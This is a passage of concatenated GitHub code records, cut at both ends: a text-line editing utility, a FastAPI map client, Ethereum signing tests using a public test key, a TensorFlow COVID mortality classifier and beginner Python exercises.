1\r\n else:\r\n cnt = 0\r\n # mtd = np.abs(np.fft.fft2(mtd))\r\n pytool.showmtd(mtd, 
verbose=True)\r\n\r\n\r\npytool.serialclose(serial)\r\n","repo_name":"zhanglixixi/pytool","sub_path":"examples/radar/test_radar_serialMTD.py","file_name":"test_radar_serialMTD.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2659054993","text":"from jukebox_resources import albums\n\nwhile True:\n print(\"Please choose your album(invalid choice exists). Enter 0 to exit!\")\n for index, (title, artist, year, songs) in enumerate(albums):\n print(\"{}: {}\".format(index+1, title))\n\n choice = int(input())\n if 1<=choice<=len(albums):\n songs_list = albums[choice - 1][3]\n elif choice == 0:\n break\n else:\n continue\n \n print(\"Please Choose a song\")\n for index, (trackNumber, song) in enumerate(songs_list):\n print(\"{}: {}\".format(index+1, song))\n choice = int(input())\n if 1<=choice<=len(songs_list):\n title = songs_list[choice-1][1]\n elif choice==0:\n break\n else:\n continue\n print(\"Playing: {}\".format(title))\n print(\"=\" * 40)\n","repo_name":"shas-hank7/python","sub_path":"03_Lists_Tuples/jukebox.py","file_name":"jukebox.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36762468796","text":"#!/usr/bin/python3\n\n# ## {R2D2919B742E} ##\n# ###########################################################################\n# What if magic existed?\n# What if a place existed where your every thought and dream come to life.\n# There is only one catch: it has to be written down.\n# Such a place exists, it is called programming.\n# - Scott Taylor Reph, RightThumb.com\n# ###########################################################################\n# ## {C3P0D40fAe8B} ##\n\nimport os\nimport sys\nimport time\n##################################################\nimport _rightThumb._construct as __\nappDBA = __.clearFocus( __name__, __file__ )\n__.appReg = appDBA\ndef focus( parentApp='', childApp='', reg=True ):\n\tglobal appDBA\n\tf = __.appName( appDBA, parentApp, childApp )\n\tif reg:\n\t\t__.appReg = f\n\treturn f\n__.registeredApps.append(focus())\n\n\nimport _rightThumb._base3 as _\n_.load()\n##################################################\nimport _rightThumb._vars as _v\nimport _rightThumb._string as _str\n# import _rightThumb._date as _date\nimport _rightThumb._dir as _dir\n# import _rightThumb._md5 as _md5\n# import _rightThumb._mimetype as _mime\n\n# import _rightThumb._auditCodeBase as _code\n# _code = _.regImp( focus(), '_rightThumb._auditCodeBase' )\n##################################################\nfrom shutil import copyfile\n##################################################\n\ndef appSwitches():\n\t_.switches.register('Input', '-i,-f,-file','file.txt')\n\t_.switches.register('Text', '-text')\n\t_.switches.register('Add', '-a,-add')\n\t_.switches.register('Remove', '-r,-remove')\n\t_.switches.register('Payload', '-payload',';. 
0 (ns/be/d/i/f)')\n\n\t\n\n\n_.appInfo[focus()] = {\n\t'file': 'changeTextEnd.py',\n\t'description': 'Add or remove text from the end of the line',\n\t'categories': [\n\t\t\t\t\t\t'json',\n\t\t\t\t\t\t'javascript',\n\t\t\t\t\t\t'programming',\n\t\t\t\t\t\t'text manipulation',\n\t\t\t\t\t\t'file manipulation',\n\t\t\t\t],\n\t'relatedapps': [],\n\t'prerequisite': [],\n\t'examples': [],\n\t'columns': [],\n\t}\n\n_.appData[focus()] = {\n\t'start': time.time(),\n\t'uuid': '',\n\t'audit': [],\n\t'pipe': [],\n\t}\n\n\n# epy replaceText\n# epy insertText\n# epy changeTextEnd\n# epy moveText\n# epy replaceFunction\n\n\n\n_.appInfo[focus()]['relatedapps'].append('')\n_.appInfo[focus()]['relatedapps'].append('p replaceText ?')\n_.appInfo[focus()]['relatedapps'].append('p insertText ?')\n_.appInfo[focus()]['relatedapps'].append('')\n_.appInfo[focus()]['relatedapps'].append('p changeTextEnd ?')\n_.appInfo[focus()]['relatedapps'].append('')\n_.appInfo[focus()]['relatedapps'].append('p moveText ?')\n_.appInfo[focus()]['relatedapps'].append('')\n_.appInfo[focus()]['relatedapps'].append('p replaceFunction ?')\n\n\n\n_.appInfo[focus()]['examples'].append('')\n_.appInfo[focus()]['examples'].append('')\n_.appInfo[focus()]['examples'].append('p changeTextEnd -i auditCodeBase.json + \";\\'hasClose;\\'\" -text \";c\" -add')\n_.appInfo[focus()]['examples'].append('p changeTextEnd -i auditCodeBase.json + \";\\'hasClose;\\'\" -text \";c\" -remove')\n_.appInfo[focus()]['examples'].append('')\n_.appInfo[focus()]['examples'].append('')\n_.appInfo[focus()]['examples'].append('p f -in *.js + ;. \"function(\" -jn | p line --c - jquery > %tmpf0%')\n_.appInfo[focus()]['examples'].append('type %tmpf0% | p changeTextEnd + ;. \"function(\" -text \";n;t;tfamily.v.tracker.push({\\'action\\';.\\'change\\',\\'function\\';.\\'*_*\\',\\'timestamp\\';.(new Date).getTime(),\\'id\\';.family.talk.thisTable});\" -payload ;. 0 nsif -add ')\n_.appInfo[focus()]['examples'].append('echo shared.js | p changeTextEnd + ;. \"function(\" -text \";n;t;tfamily.v.tracker.push({\\'action\\';.\\'change\\',\\'function\\';.\\'*_*\\',\\'timestamp\\';.(new Date).getTime()});\" -payload ;. 
0 nsif -add')\n_.appInfo[focus()]['examples'].append('')\n_.appInfo[focus()]['examples'].append('')\n\n# _.appInfo[focus()]['columns'].append({'name': 'name', 'abbreviation': 'n'})\n\n\n\ndef registerSwitches( argvProcessForce=False ):\n\tglobal appDBA\n\tif not __.appReg == appDBA and appDBA in __.appReg:\n\n\t\tif not __name__ == '__main__':\n\t\t\t_.argvProcess = argvProcessForce\n\t\telse:\n\t\t\t_.argvProcess = True\n\n\t\t_.load()\n\t\t_.appInfo[__.appReg] = _.appInfo[appDBA]\n\t\t_.appData[__.appReg] = _.appData[appDBA]\n\t__.constructRegistration(_.appInfo[__.appReg]['file'],__.appReg)\n\tappSwitches()\n\t_.defaultScriptTriggers()\n\n\t_.switches.trigger('Input',_.myFileLocations)\n\t\t# trigger settings\n\t_.myFileLocation_Print = False\n\n\t# _.switches.trigger('Watched', _.txt2Date)\n\t# _.switches.trigger('Input',_.formatColumns)\n\t_.switches.process()\n\n\n\nif not __name__ == '__main__':\n\t_.argvProcess = False\nelse:\n\t_.argvProcess = True\n\nregisterSwitches()\n\n\n\ndef fieldSet( switchName, switchField, switchValue, theFocus=False ):\n\tif not type( theFocus ) == bool:\n\t\ttheFocus = theFocus\n\t_.switches.fieldSet( switchName, switchField, switchValue, theFocus )\n\ndef setPipeData(data):\n\t# _.appData[__.appReg]['pipe'] = list(data)\n\tif len(data) > 0:\n\t\t_.appData[__.appReg]['pipe'] = []\n\t\tfor pd in data:\n\t\t\tpd = pd.replace('\\n','')\n\t\t\tif not pd == '':\n\t\t\t\t_.appData[__.appReg]['pipe'].append(pd)\n\ndef pipeCleaner():\n\tif len( _.appData[__.appReg]['pipe'] ):\n\t\tif type( _.appData[__.appReg]['pipe'][0] ) == str:\n\t\t\tif not _.appData[__.appReg]['pipe'][0][0] in _str.safeChar:\n\t\t\t\t_.appData[__.appReg]['pipe'][0] = _.appData[__.appReg]['pipe'][0][1:]\n\t\t\tfor i,pipeData in enumerate(_.appData[__.appReg]['pipe']):\n\t\t\t\t_.appData[__.appReg]['pipe'][i] = _.appData[__.appReg]['pipe'][i].replace('\\n','')\n\n\n\n_.appData[__.appReg]['pipe'] = False\nif not sys.stdin.isatty():\n\tsetPipeData( sys.stdin.readlines() )\n\t# _.appData[__.appReg]['pipe'] = sys.stdin.readlines()\n\t# pipeCleaner()\n\n\n\n########################################################################################\n# START\n\nfileBackup = _.regImp( __.appReg, 'fileBackup' )\n# fileBackup.switch( 'Silent' )\nfileBackup.switch( 'isRunOnce' )\nfileBackup.switch( 'DoNotSchedule' )\nfileBackup.switch( 'Flag', 'changeTextEnd' )\ntheText = ''\ndef action():\n\tglobal theText\n\n\t# _.pr( _.switches.value('Input') )\n\n\tif _.switches.isActive('Text'):\n\t\t\n\t\ttheText = _.ci(_.switches.value('Text'))\n\t\ttheText = _str.cleanBE( theText, ' ' )\n\n\tif len(_.switches.value('Plus'))<3:\n\t\t_.pr( 'Error: Plus' )\n\t\tsys.exit()\n\n\tif not type( _.appData[__.appReg]['pipe'] ) == bool or _.switches.isActive('Input') and os.path.isfile( _.switches.value('Input') ):\n\t\tif type( _.appData[__.appReg]['pipe'] ) == bool:\n\t\t\t_.appData[__.appReg]['pipe'] = []\n\t\t\t_.appData[__.appReg]['pipe'].append( _.switches.value('Input') )\n\t\t\n\t\tfiles = _.appData[__.appReg]['pipe']\n\t\tfor filename in files:\n\t\t\tif os.path.isfile( filename ):\n\t\t\t\tprocessFile(filename)\n\n\n\ndef getTabs( line ):\n\tpre = ''\n\tfor ch in str(line):\n\t\tif ch == ' ' or ch == '\\t':\n\t\t\tpre += ch\n\t\telse:\n\t\t\treturn pre\n\treturn pre\n\ndef processFile( filename ):\n\tglobal theText\n\n\t_.pr()\n\t_.pr('processing:', filename)\n\tfileBackup.switch( 'Input', filename )\n\tfileBackup.switch( 'Flag', 'pre changeTextEnd' )\n\trecoveryFile = fileBackup.do( 'action' )\n\n\tfile = 
_.getText( filename, raw=True )\n\n\tnewFile = []\n\trows = []\n\t\n\n\tif _.switches.isActive('Payload'):\n\t\tpayload = _.switches.value('Payload').split( ',' )\n\t\tnospace = False\n\t\tbe = False\n\t\tdup = False\n\t\taddi = False\n\t\taddf = False\n\t\tfor ii,p in enumerate(payload):\n\t\t\tpayload[ii] = _.ci( payload[ii] )\n\t\t\tif ii == 0:\n\t\t\t\tdelim = payload[ii]\n\t\t\telif ii == 1:\n\t\t\t\trow = int(payload[ii])\n\t\t\telif ii == 2:\n\t\t\t\tif 'n' in payload[ii].lower() and 's' in payload[ii].lower():\n\t\t\t\t\tnospace = True\n\t\t\t\tif 'b' in payload[ii].lower() and 'e' in payload[ii].lower():\n\t\t\t\t\tbe = True\n\t\t\t\tif 'd' in payload[ii].lower():\n\t\t\t\t\tdup = True\n\t\t\t\tif 'i' in payload[ii].lower():\n\t\t\t\t\taddi = True\n\t\t\t\tif 'f' in payload[ii].lower():\n\t\t\t\t\taddf = True\n\t\t\t\t\tf_info = _dir.fileInfo( filename )['name']\n\n\tnewText = theText\n\tfor i,line in enumerate(file.split('\\n')):\n\t\tline = line.replace( '\\n', '' )\n\t\tfound = False\n\t\tif _.showLine(line):\n\t\t\tfound = True\n\n\t\t\tif _.switches.isActive('Add'):\n\t\t\t\tif _.switches.isActive('Payload'):\n\t\t\t\t\t# _.pr()\n\t\t\t\t\t# _.pr(line)\n\t\t\t\t\tpayloadData = line.split( delim )[ row ]\n\t\t\t\t\t# _.pr(payloadData)\n\t\t\t\t\tif dup:\n\t\t\t\t\t\tpayloadData = _str.replaceDuplicate( payloadData, ' ' )\n\t\t\t\t\t\tpayloadData = _str.replaceDuplicate( payloadData, '\\t' )\n\t\t\t\t\tif be:\n\t\t\t\t\t\tpayloadData = _str.cleanBE( payloadData, ' ' )\n\t\t\t\t\t\tpayloadData = _str.cleanBE( payloadData, '\\t' )\n\t\t\t\t\tif nospace:\n\t\t\t\t\t\tpayloadData = payloadData.replace( ' ', '' )\n\t\t\t\t\t\tpayloadData = payloadData.replace( '\\t', '' )\n\t\t\t\t\tpass\n\t\t\t\t\tif addf:\n\t\t\t\t\t\tpayloadData += '[' + str( f_info ) + ']'\n\t\t\t\t\tif addi:\n\t\t\t\t\t\tpayloadData += '(' + str( i ) + ')'\n\t\t\t\t\tnewText = theText.replace( '*_*', payloadData )\n\t\t\t\t\tpayloadData = ''\n\n\n\t\t\t\tnewFile.append( line + newText )\n\n\n\t\t\t# pass\n\n\t\t\t\t\t\n\t\t\tif _.switches.isActive('Remove'):\n\t\t\t\tline = _str.cleanEnd( line, ' ' )\n\t\t\t\tline = _str.cleanEnd( line, '\\t' )\n\t\t\t\tline = _str.cleanEnd( line, theText )\n\t\t\t\tnewFile.append( line )\n\n\t\tif not found:\n\t\t\tnewFile.append( line )\n\n\t_.saveText( newFile, filename )\n\n\tfileBackup.switch( 'Input', filename )\n\tfileBackup.switch( 'Flag', 'changeTextEnd' )\n\trecoveryFile = fileBackup.do( 'action' )\n\n\tif _.switches.isActive('Input'):\n\n\t\tkeep=input('Keep changes? ')\n\t\tif 'n' in keep.lower():\n\t\t\ttry:\n\t\t\t\tcopyfile(recoveryFile, filename)\n\t\t\t\t_.pr( 'Undo successful' )\n\t\t\texcept Exception as e:\n\t\t\t\t_.pr( 'Undo fail' )\n\n# type %tmpf0% | p changeTextEnd + ;. \"function(\" -text \";n;t;tfamily.v.tracker.push({'action';.'change','function';.'*_*','timestamp';.(new Date).getTime(),'id';.family.talk.thisTable,'d';.family.talk.adherence.r_d(),'a';.family.talk.adherence.r_a()});\" -payload ;. 
0 nsif -add - setTimeout\n\n########################################################################################\nif __name__ == '__main__':\n\taction()\n\n\n\n\n\n\n\n","repo_name":"rightthumb/rightthumb-widgets-v0","sub_path":"widgets/python/changeTextEnd.py","file_name":"changeTextEnd.py","file_ext":"py","file_size_in_byte":9686,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"7737191","text":"from typing import Optional\n\nfrom fastapi import FastAPI, HTTPException, Query\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom didmap_api.enums.filters import Filters\nfrom didmap_api.enums.map_types import MapTypes\nfrom didmap_api.enums.game_types import GameTypes\nfrom didmap_api.rdf_utils.collection_graph import CollectionGraph\nfrom didmap_api.rdf_utils.map_graph import MapGraph\n\n\napp = FastAPI(\n title=\"Didmap API client\",\n description=\"Unofficial Python API client for https://mapasinteractivos.didactalia.net\",\n version=\"1.0.0\",\n)\n\n\norigins = ['*']\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"GET\"],\n allow_headers=[\"*\"],\n)\n\n\n@app.get(\"/mapcollection/\")\nasync def get_collection(\n map_type: MapTypes,\n continent: Optional[str] = None,\n country: Optional[str] = None,\n region: Optional[str] = None,\n game_type: Optional[GameTypes] = None,\n):\n \"\"\"\n Retrives info about several Didactalia's interactive maps based on the query parameters provided\n \"\"\"\n filters = [\n (Filters.map_type, map_type),\n (Filters.continent, continent),\n (Filters.country, country),\n (Filters.region, region),\n (Filters.game_type, game_type),\n ]\n\n coll = CollectionGraph()\n coll.load_collection(filters)\n\n if (coll.query_collection()):\n return { \"url\": coll.url, \"results\": len(coll.maps), \"data\": coll.maps }\n else:\n raise HTTPException(status_code=404, detail=\"Could not find the collection\")\n\n\n@app.get(\"/map/\")\nasync def get_map(map_path: str = Query(..., description=\"Example path: 'physical-relief-of-central-america/0f6c3cbb-5c17-4c8f-b3c1-f9238bea0e81'\")):\n \"\"\"Get info about a Didactalia's interactive map\"\"\"\n map_graph = MapGraph()\n map_graph.load_map_ressource(map_path)\n\n if (map_graph.query_map_ressource()):\n return map_graph.map_info\n else:\n raise HTTPException(status_code=404, detail=\"Could not find the collection\")","repo_name":"jblanper/didmap-client-back","sub_path":"didmap_api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13547109794","text":"#encoding=UTF-8\nimport rlp\nfrom rlp.sedes import big_endian_int, Binary, binary\nfrom eth_rlp import HashableRLP\nfrom eth_utils.curried import keccak\nfrom hexbytes import HexBytes\nfrom eth_account import Account\nfrom web3 import Web3\n\n\nclass LegacyTransaction(HashableRLP):\n fields = (\n ('nonce', big_endian_int),\n ('gasPrice', big_endian_int),\n ('gas', big_endian_int),\n ('to', Binary.fixed_length(20, allow_empty=True)),\n ('value', big_endian_int),\n ('data', binary),\n )\n\n\nclass Transaction(HashableRLP):\n fields = (\n ('nonce', big_endian_int),\n ('gasPrice', big_endian_int),\n ('gas', big_endian_int),\n ('to', Binary.fixed_length(20, allow_empty=True)),\n ('value', big_endian_int),\n ('data', binary),\n ('v', big_endian_int),\n ('r', big_endian_int),\n ('s', big_endian_int),\n )\n\n\ndef 
sign_legacy_tx():\n tx = {\n \"to\": HexBytes(\"0x3535353535353535353535353535353535353535\"),\n \"value\": 1000000000000000000,\n \"nonce\": 9,\n \"gas\": 21000,\n \"gasPrice\": 20000000000,\n \"data\": b\"\",\n }\n encoded_tx = LegacyTransaction.from_dict(tx)\n print(\"rlp encode result:\", rlp.encode(encoded_tx).hex())\n\n signing_hash = encoded_tx.hash()\n print(\"signing msg hash:\", signing_hash.hex())\n\n key_obj = eth_key_obj(private_key=\"4646464646464646464646464646464646464646464646464646464646464646\")\n\n result = key_obj.sign_msg_hash(signing_hash)\n print_sign_result(result)\n\n\ndef sign_normal_tx():\n tx = {\n \"to\": HexBytes(\"0x3535353535353535353535353535353535353535\"),\n \"value\": 1000000000000000000,\n \"nonce\": 9,\n \"gas\": 21000,\n \"gasPrice\": 20000000000,\n \"data\": b\"\",\n \"v\": 1,\n \"r\": 0,\n \"s\": 0,\n }\n sign_155_tx(tx)\n\n\ndef sign_155_tx(transaction):\n print(transaction)\n encoded_tx = Transaction.from_dict(transaction)\n\n print(rlp.encode(encoded_tx).hex())\n print(encoded_tx.hash().hex())\n\n\n private_key = \"4646464646464646464646464646464646464646464646464646464646464646\"\n acct = Account.from_key(private_key)\n print(\"address:\", acct.address)\n # signed_result = acct.signHash(\"0xdaf5a779ae972f972197303d7b574746c7ef83eadac0f2791ad23db92e4c8e53\")\n signed_result = acct.sign_msg_hash(\"0xdaf5a779ae972f972197303d7b574746c7ef83eadac0f2791ad23db92e4c8e53\")\n print(\"r: \", signed_result.r)\n print(\"s: \", signed_result.s)\n\n transaction[\"r\"] = signed_result.r\n transaction[\"s\"] = signed_result.s\n transaction[\"v\"] = 37\n\n print(transaction)\n encoded_signed_tx = Transaction.from_dict(transaction)\n\n raw_tx = rlp.encode(encoded_signed_tx).hex()\n print(raw_tx)\n\n sender = Account.recover_transaction(raw_tx)\n print(\"sender: \", sender)\n\n\ndef eth_key_obj(private_key=\"\"):\n acct = Account.from_key(private_key)\n key_obj = acct._key_obj\n return key_obj\n\n\ndef print_sign_result(result):\n \"\"\"\n Print the signature result\n \"\"\"\n print(\"v: \", result.v)\n print(\"r: \", result.r)\n print(\"s: \", result.s)\n print(\"signature: \", result)\n\n\ndef test_sign_hash():\n \"\"\"\n Sign a hash\n \"\"\"\n key_obj = eth_key_obj()\n\n # signing_hash = \"dd54f25d0bbeae343a1dec3acce8dc5b3a0886bdb9c5e667f65d5bbbe11bc093\"\n signing_hash = \"22658f1dab0720e8bf599551cc6dd75230ed4efefc7f6694f0b389e0807a0e52\"\n\n result = key_obj.sign_msg_hash(HexBytes(signing_hash))\n print_sign_result(result)\n\n\ndef test_sign_msg():\n \"\"\"\n Sign the message itself\n \"\"\"\n key_obj = eth_key_obj()\n\n # message = \"I will pay Bob 1 ETH.\"\n message = \"0x22658f1dab0720e8bf599551cc6dd75230ed4efefc7f6694f0b389e0807a0e52\"\n # message = \"0x22658f1dab0720e8bf599551cc6dd75230ed4efefc7f6694f0b389e0807a\"\n\n # Add the fixed prefix\n total_msg = \"\\x19Ethereum Signed Message:\\n\" + str(len(message)) + message\n\n singing_msg = Web3.toBytes(text=total_msg)\n\n result = key_obj.sign_msg(singing_msg)\n print_sign_result(result)\n\n\ndef test_sign_msg_hash():\n \"\"\"\n Sign the message hash\n \"\"\"\n key_obj = eth_key_obj()\n\n message = \"I will pay Bob 1 ETH.\"\n msg_hash = keccak(text=message)\n # print(msg_hash.hex())\n\n msg_hash = Web3.toBytes(hexstr=\"0x22658f1dab0720e8bf599551cc6dd75230ed4efefc7f6694f0b389e0807a0e52\")\n\n singing_msg = Web3.toBytes(text=\"\\x19Ethereum Signed Message:\\n32\") + msg_hash\n sig_msg_hash = keccak(singing_msg)\n # sig_msg_hash = Web3.toBytes(hexstr=\"0x22658f1dab0720e8bf599551cc6dd75230ed4efefc7f6694f0b389e0807a0e52\")\n\n result = key_obj.sign_msg_hash(sig_msg_hash)\n 
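# sig_msg_hash above is the EIP-191 \"personal message\" digest,\n # keccak(b\"\\x19Ethereum Signed Message:\\n32\" + msg_hash); eth_account's\n # Account.recover_message recomputes the same digest when verifying, which is\n # why sign_msg_hash() is called on it here rather than on the raw msg_hash.\n 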
print_sign_result(result)\n\n\ndef main():\n sign_legacy_tx()\n # sign_normal_tx()\n # test_sign_hash()\n # test_sign_msg()\n # test_sign_msg_hash()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zhwindy/blockchain-bot","sub_path":"tools/signature.py","file_name":"signature.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29653842433","text":"# Load TF-DF\nimport tensorflow_decision_forests as tfdf\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\nimport math\n\ntask = tfdf.keras.Task.CLASSIFICATION\nmodel = tfdf.keras.RandomForestModel(task=task)\ntarget = \"OBITO\"\nporcentagem_obito = 0\n\n\ndef train():\n # Load a dataset in a Pandas dataframe.\n df = pd.read_csv('datasets/COVID.CSV', sep=';')\n # cols_to_drop = [\"DATE_DIED\"]\n cols_to_drop = [\"SEX\", \"RENAL_CHRONIC\", \"CARDIOVASCULAR\", \"ASTHMA\",\n \"OTHER_DISEASE\", \"COPD\", \"INMSUPR\", \"DATE_DIED\", \"TOBACCO\",\n \"PREGNANT\", \"USMER\", \"DIABETES\", \"HIPERTENSION\"]\n\n df = df.drop(columns=cols_to_drop)\n\n # drop all dolumns with 97 and 99\n df['CLASIFFICATION_FINAL'] = np.where(df['CLASIFFICATION_FINAL'] > 3, 2, 1)\n for label in df.head():\n df = df[df[label] != 97]\n df = df[df[label] != 99]\n if (label != \"AGE\"):\n df[label] = np.where(df[label] == 2, 0, 1)\n\n df_died = df[(df.OBITO == 1)]\n\n porcentagem_obito = (len(df_died)/len(df)) * 100\n\n fig, axs = plt.subplots(2, 2)\n axs[0, 0].hist(df.AGE, 15, rwidth=0.9)\n axs[0, 0].hist(df_died.AGE, 15, rwidth=0.9)\n axs[0, 0].grid(axis='y', alpha=0.75)\n axs[0, 0].set_title(\"Idade\")\n\n axs[1, 0].hist(df.CLASIFFICATION_FINAL, 2,\n rwidth=0.9, orientation=\"horizontal\")\n axs[1, 0].hist(df_died.CLASIFFICATION_FINAL, 2,\n rwidth=0.9, orientation=\"horizontal\")\n axs[1, 0].grid(axis='x', alpha=0.75)\n axs[1, 0].set_title(\"Resultado de teste para COVID\")\n\n axs[0, 1].hist(df.PNEUMONIA, 2, rwidth=0.9, orientation=\"horizontal\")\n axs[0, 1].hist(df_died.PNEUMONIA, 2, rwidth=0.9, orientation=\"horizontal\")\n axs[0, 1].grid(axis='x', alpha=0.75)\n axs[0, 1].set_title(\"Pacientes com pneumonia\")\n\n axs[1, 1].hist(df.INTUBED, 2, rwidth=0.9, orientation=\"horizontal\")\n axs[1, 1].hist(df_died.INTUBED, 2, rwidth=0.9, orientation=\"horizontal\")\n axs[1, 1].grid(axis='x', alpha=0.75)\n axs[1, 1].set_title(\"Pacientes que foram entubados\")\n fig.show()\n\n train_df, test_df = train_test_split(df, test_size=0.2,\n random_state=42,\n shuffle=True)\n\n # Convert the dataset into a TensorFlow dataset.\n\n train_ds = tfdf.keras.pd_dataframe_to_tf_dataset(\n train_df, label=target, task=task)\n test_ds = tfdf.keras.pd_dataframe_to_tf_dataset(\n test_df, label=target, task=task)\n\n # Train a Random Forest model.\n\n # optional step - add evaluation metrics\n model.compile(metrics=[\"mse\", \"mape\", \"accuracy\"])\n\n model.fit(train_ds)\n\n # Evaluate the model.\n evaluation = model.evaluate(test_ds, return_dict=True)\n\n print(evaluation)\n print(f\"MSE: {evaluation['mse']:.2f}\")\n print(f\"RMSE: {math.sqrt(evaluation['mse']):.2f}\")\n print(f\"MAPE: {evaluation['mape']:.2f}\")\n print(f\"accuracy: {evaluation['accuracy']:.2f}\")\n\n # Export the model to a SavedModel.\n\n\ndef model_info():\n # Summary of the model structure.\n print(\"plotting summary\")\n model.summary()\n\n # plot the first tree, 
restricted in depth (max_depth=15)\n print(\"plotting tree\")\n html = tfdf.model_plotter.plot_model(model, tree_idx=0, max_depth=15)\n\n output_file = open('index.html', 'w')\n output_file.write(html)\n output_file.close()\n\n # print(\"plotting graphic\")\n # model.make_inspector().features()\n # model.make_inspector().evaluation()\n\n inspector = model.make_inspector()\n print(\"Model type:\", inspector.model_type())\n\n print(\"Number of trees:\", inspector.num_trees())\n print(\"Objective:\", inspector.objective())\n print(\"Input features:\", inspector.features())\n\n inspector.evaluation()\n\n print(f\"Available variable importances:\")\n for importance in inspector.variable_importances().keys():\n print(\"\\t\", importance)\n # inspector.variable_importances()[\"SUM_SCORE\"]\n\n logs = inspector.training_logs()\n\n plt.figure(figsize=(12, 4))\n\n # Mean decrease in AUC of the class 1 vs the others.\n variable_importances = inspector.variable_importances()[\"SUM_SCORE\"]\n\n # Extract the feature name and importance values.\n #\n # `variable_importances` is a list of tuples.\n feature_names = [vi[0].name for vi in variable_importances]\n feature_importances = [vi[1] for vi in variable_importances]\n # The features are ordered in decreasing importance value.\n feature_ranks = range(len(feature_names))\n\n bar = plt.barh(feature_ranks, feature_importances,\n label=[str(x) for x in feature_ranks])\n plt.yticks(feature_ranks, feature_names)\n plt.gca().invert_yaxis()\n\n # TODO: Replace with \"plt.bar_label()\" when available.\n # Label each bar with values\n for importance, patch in zip(feature_importances, bar.patches):\n plt.text(patch.get_x() + patch.get_width(),\n patch.get_y(), f\"{importance:.4f}\", va=\"top\")\n\n plt.xlabel(\"SUM_SCORE\")\n plt.title(\"Sum of the score of each variable\")\n plt.tight_layout()\n plt.show()\n\n # explain the model's predictions using SHAP\n\n plt.figure(figsize=(12, 4))\n\n plt.plot([log.num_trees for log in logs], [\n log.evaluation.rmse for log in logs])\n plt.xlabel(\"Number of trees\")\n plt.ylabel(\"RMSE (out-of-bag)\")\n plt.title(\"RMSE vs number of trees\")\n\n plt.show()\n\n\ntrain()\nmodel_info()\n","repo_name":"brendoLoR/decision_tree_covid","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38787385041","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Changing Data Types \n\n# In[ ]:\n\n\na = \"5\"\nb= 10\nprint(\"Numeric sum: \",int(a)+b)\nprint(\"String sum: \",a+str(b))\n\n\n# # LIST COMMANDS \n\n# In[ ]:\n\n\nliste=[1,5,2,3,4]\nprint(\"Length: \",len(liste))\nprint(\"Third element: \",liste[2])\nprint(\"Last element: \",liste[-1])\nprint(\"From 0 to 2: \",liste[0:3])\nliste.append(9)\nprint(\"9 appended: \",liste)\nliste.remove(2)\nprint(\"2 removed: \",liste)\nliste.sort()\nprint(\"Sorted list: \",liste)\nliste.insert(2,11)\nprint(\"11 inserted at index 2: \",liste)\nprint(\"how many 13s: \",liste.count(13))\nprint(\"index of 5: \",liste.index(5))\n\n\n# # DICTIONARY BASICS \n\n# In[ ]:\n\n\ning_sozluk = {\"dil\": \"language\", \"bilgisayar\": \"computer\", \"masa\": \"table\"}\nprint(ing_sozluk.keys())\nprint(ing_sozluk.values())\ning_sozluk[\"yellow\"]=\"sarı\"\nprint(ing_sozluk)\n\n\n# In[ ]:\n\n\ning_sözlük = {\"dil\": \"language\", \"bilgisayar\": \"computer\", \"masa\": \"table\"}\n\nsorgu = input(\"Please type the word you want to look up:\")\n\nprint(ing_sözlük.get(sorgu, \"This word is not in our database!\"))\n\n\n# # TUPLE \n\n# In[ ]:\n\n\nt = (1,2,3,3,4,5,6)\na = 1,2,3,4,5,6\nprint(\"type of a: \",type(a))\nt.count(3)\n\n\n# # Calculator \n\n# In[ ]:\n\n\na=int(input(\"Enter the 1st number: \"))\nb=int(input(\"Enter the 2nd number: \"))\n\nprint(\"Choose an operation\")\nprint(\"1 = Addition\")\nprint(\"2 = Subtraction\")\nprint(\"3 = Multiplication\")\nprint(\"4 = Division\")\n\nislem=int(input(\"Choose an operation: \"))\n\nif islem ==1:\n sonuc=a+b\n print(\"sum of {} and {} = \".format(a,b),sonuc)\nelif islem ==2:\n sonuc=a-b\n print(\"difference of {} and {} = \".format(a,b),sonuc)\nelif islem ==3:\n sonuc=a*b\n print(\"product of {} and {} = \".format(a,b),sonuc)\nelif islem ==4:\n sonuc=a/b\n print(\"quotient of {} and {} = \".format(a,b),sonuc)\nelse:\n print(\"Please enter a valid operation !!! \")\n\n\n# # Factorial \n\n# In[ ]:\n\n\nx=int(input(\"Enter a number: \"))\n\nfaktoriyel=1\n\nfor i in range(faktoriyel,x+1):\n faktoriyel=faktoriyel*i\nprint(\"Factorial: \",faktoriyel)\n\n\n# # Finding the Max \n\n# In[ ]:\n\n\nliste2=[1,5,9,2354,123456,213246,2222,200,985]\n\nmaxi=-10000000000\nfor each in liste2:\n if(each>maxi):\n maxi=each\n else:\n continue\nprint(maxi)\n\n\n# # SUM \n\n# In[ ]:\n\n\na=int(input(\"Enter a number: \"))\nb=int(input(\"Enter a number: \"))\nc=int(input(\"Enter a number: \"))\n\nliste=[a,b,c]\n\ntoplam=0\n\nfor each in liste:\n toplam=toplam+each\n \nprint(toplam)\n\n\n# # CENTURY CALCULATION\n\n# In[ ]:\n\n\nyil=int(input(\"Enter a year: \"))\n\nstr_yil=str(yil)\n\nif (len(str_yil)<3):\n yy=1\n print(\"Century\",yy)\nelif (len(str_yil)==3):\n yy=int(str_yil[0])+1\n print(\"Century: \",yy)\nelif (len(str_yil)==4):\n yy=int(str_yil[0:2])+1\n 